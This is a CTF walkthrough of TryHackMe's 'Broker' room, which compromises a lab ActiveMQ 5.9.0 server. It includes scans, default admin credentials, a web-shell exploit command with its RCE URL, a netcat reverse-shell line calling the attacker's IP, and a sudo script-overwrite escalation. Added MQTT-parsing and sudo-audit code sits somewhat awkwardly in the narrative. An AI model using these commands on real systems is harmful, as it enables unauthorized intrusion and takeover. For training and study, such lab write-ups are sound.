Broker — TryHackMe
This is the write-up for TryHackMe's room named Broker. The description says: Paul and Max found a way to chat at work by using a certain kind of software. They think they outsmarted their boss, but do not seem to know that eavesdropping is quite possible… They better be careful… Interesting. This room can be found here:
As always, let's scan the target with NMAP to see what is running on it.
# Identify the list of services running on the target machine
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.160.160
PORT      STATE SERVICE
22/tcp    open  ssh
1883/tcp  open  mqtt
8161/tcp  open  patrol-snmp
42449/tcp open  unknown
# Perform further information gathering on the open ports identified above
└─$ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449 10.10.160.160
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|   2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
|   256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
|_  256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
1883/tcp  open  mqtt?
8161/tcp  open  http    Jetty 7.6.9.v20130131
|_http-title: Apache ActiveMQ
42449/tcp open  tcpwrapped
Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up)
So from the above NMAP scan the required ports are: 1883,8161
What is the name of the software they use?
Again, NMAP clearly shows that the software used is ActiveMQ. Port 8161 is also serving HTTP, so let's check it out in the browser.
Yes, it is indeed ActiveMQ. So let's brute-force directories that might prove useful using ffuf.
└─$ ffuf -u http://10.10.99.191:8161/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

ffuf v1.2.1
________________________________________________
 :: Method           : GET
 :: URL              : http://10.10.99.191:8161/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .html .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

images                  [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html              [Status: 200, Size: 5968, Words: 2626, Lines: 134]
admin                   [Status: 401, Size: 1278, Words: 977, Lines: 33]
api                     [Status: 302, Size: 0, Words: 1, Lines: 1]
styles                  [Status: 302, Size: 0, Words: 1, Lines: 1]
                        [Status: 200, Size: 5968, Words: 2626, Lines: 134]
:: Progress: [882184/882184] :: Job [1/1] :: 987 req/sec :: Duration: [0:17:30] :: Errors: 0 ::
/admin looks interesting. Let's access this page; it asks for a username and password. Searching around, I found here that the default credentials for the Apache ActiveMQ Administration Console are simply admin/admin. Tried them and it worked, and I also noticed the version number, i.e. 5.9.0.
Which videogame are Paul and Max talking about?
At this point it is clear that we need to talk to the mqtt daemon running on port 1883 (check the nmap scans). So, searching for an mqtt client, I found this:
Also found this link very useful:
But we still need a "topic" for subscribe() to subscribe to in order to receive messages. The topic was found here:
So I edited the code from the GitHub link and added the topic, the IP address of the target and the MQTT version, which needed to be 3.1:
Ran the code as
Voila! We are able to see the chat between Paul and Max, and the video game's name is in this chat. Great. Now we need to exploit some vulnerability in this version of ActiveMQ to move forward. Searchsploit revealed a vulnerability that also applies to 5.9.0.
Reading more info from this Metasploit module, I found a link to the CVE for the vulnerability:
For some reason the Metasploit module for exploitation doesn't work, so I searched around for any available exploit and found this one on GitHub:
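Why the client had to speak MQTT 3.1 comes down to the first packet it sends: a 3.1 CONNECT carries the protocol name "MQIsdp" and level 3, while 3.1.1 sends "MQTT" and level 4, and an old broker rejects the latter. The encoder/decoder below is an added example (not the client from the write-up or any library's code); it builds constructed CONNECT frames and decodes them, reporting the version and whether the session carried a username at all, which is the thing a broker operator would check for when asking how a chat could be read by anyone who connected.

```python
import struct
# MQTT 3.1 CONNECT carries protocol name "MQIsdp", level 3; 3.1.1 sends "MQTT", level 4.
PROTOCOL_NAMES = {3: b"MQIsdp", 4: b"MQTT"}
VERSIONS = {(b"MQIsdp", 3): "3.1", (b"MQTT", 4): "3.1.1"}

def _encode_remaining_length(n):
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)

def _decode_remaining_length(data, off):
    value, mult = 0, 1
    while True:
        byte = data[off]; off += 1
        value += (byte & 0x7F) * mult
        if not byte & 0x80:
            return value, off
        mult *= 128

def _mqtt_str(s):                      # length-prefixed UTF-8 string
    return struct.pack(">H", len(s)) + s.encode()

def build_connect(client_id, level=3, username=None, password=None, keepalive=60):
    """Encode a CONNECT packet (constructed sample; nothing is sent on the wire)."""
    flags, payload = 0x02, _mqtt_str(client_id)   # 0x02 = clean session
    if username is not None:
        flags |= 0x80; payload += _mqtt_str(username)
    if password is not None:
        flags |= 0x40; payload += _mqtt_str(password)
    body = (_mqtt_str(PROTOCOL_NAMES[level].decode()) + bytes([level, flags])
            + struct.pack(">H", keepalive) + payload)
    return b"\x10" + _encode_remaining_length(len(body)) + body

def parse_connect(packet):
    """Decode a CONNECT packet: which version it speaks and whether it authenticated."""
    if packet[0] >> 4 != 1:
        raise ValueError("not a CONNECT packet")
    _, off = _decode_remaining_length(packet, 1)
    name_len = struct.unpack(">H", packet[off:off + 2])[0]; off += 2
    name = packet[off:off + name_len]; off += name_len
    level, flags = packet[off], packet[off + 1]; off += 2
    keepalive = struct.unpack(">H", packet[off:off + 2])[0]; off += 2
    cid_len = struct.unpack(">H", packet[off:off + 2])[0]; off += 2
    return {"version": VERSIONS.get((name, level), "unknown"), "keepalive": keepalive,
            "client_id": packet[off:off + cid_len].decode(),
            "anonymous": not (flags & 0x80)}   # no username flag => unauthenticated
```

Feeding parse_connect() the first bytes of each client session from a capture is enough to list which clients connected anonymously and which protocol level they used.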
It was pretty simple to run:
python3 ActiveMQ_putshell.py -u http://10.10.120.228:8161
This put a web shell at http://10.10.120.228:8161/admin/guo.jsp, which can be used like http://10.10.120.228:8161/admin/guo.jsp?pwd=gshell&shell=whoami to get remote code execution.
To gain a reverse shell I tried a few payloads, and this one worked. Note: start a netcat listener on the attacking machine before executing the reverse shell payload URL, and replace the IP address with your own:
nc 10.8.98.192 9999 -e /bin/sh
Upgrade and Stabilize Shell
Run the following commands on the target to upgrade the current shell:
/usr/bin/script -qc /bin/bash /dev/null
Ctrl+Z to background the shell, then:
stty raw -echo
The flag was in the same directory where we got our reverse shell:
sudo -l indicated that we can run subcribe.py in the /opt/apache-activemq-5.9.0 directory. The current user activemq also has write permissions on this file.
So we can easily get root by adding the following code to subcribe.py using nano, as vi was not available on the target:
and then running it with sudo:
We are root and found the root flag at
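The weakness behind this escalation is a sudo rule pointing at a file its invoking user can edit. As an added hardening check (not part of the write-up or the room), the script below parses `sudo -l` output for every absolute path a rule names, the interpreter and the script alike, and reports why a non-root user could alter it, checking the parent directory too since a writable directory lets the file be replaced. The sample rule, including the python3 interpreter and hostname, is a constructed assumption.

```python
import os
import re
import stat

# Constructed sample of a `sudo -l` entry of the kind the write-up describes;
# the exact rule and interpreter on the box are assumptions, not taken from the room.
SAMPLE_SUDO_L = """User activemq may run the following commands on broker:
    (root) NOPASSWD: /usr/bin/python3 /opt/apache-activemq-5.9.0/subcribe.py
"""
RULE = re.compile(r"\((?P<runas>[^)]+)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>/\S.*)")

def targets_from_sudo_l(output):
    """Absolute paths named in each rule: the binary and any script it is given."""
    paths = []
    for line in output.splitlines():
        m = RULE.search(line)
        if m:
            paths.extend(tok for tok in m.group("cmd").split() if tok.startswith("/"))
    return paths

def weak_permissions(uid, mode):
    """Why a given owner/mode lets a non-root user alter a sudo target."""
    reasons = []
    if uid != 0:
        reasons.append(f"owned by uid {uid}, not root")
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_path(path):
    """Check the file and its parent directory (a writable parent allows replacing the file)."""
    findings = {}
    for label, p in (("file", path), ("dir", os.path.dirname(path) or "/")):
        try:
            st = os.stat(p)
        except FileNotFoundError:
            findings[label] = [f"{p} missing: could be created by another user"]
            continue
        findings[label] = weak_permissions(st.st_uid, st.st_mode)
    return findings

def audit(output=SAMPLE_SUDO_L):
    """Map every sudo target to its findings; an empty list means nothing to fix."""
    return {p: audit_path(p) for p in targets_from_sudo_l(output)}
```

Run audit() with the real `sudo -l` output on a host; any non-empty list is a rule to tighten (root-own the file and its directory with mode 0755 or stricter, or drop the rule).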
This was an interesting room and the spying on the chat part was a winner for me. If you like the write-up please clap and follow me.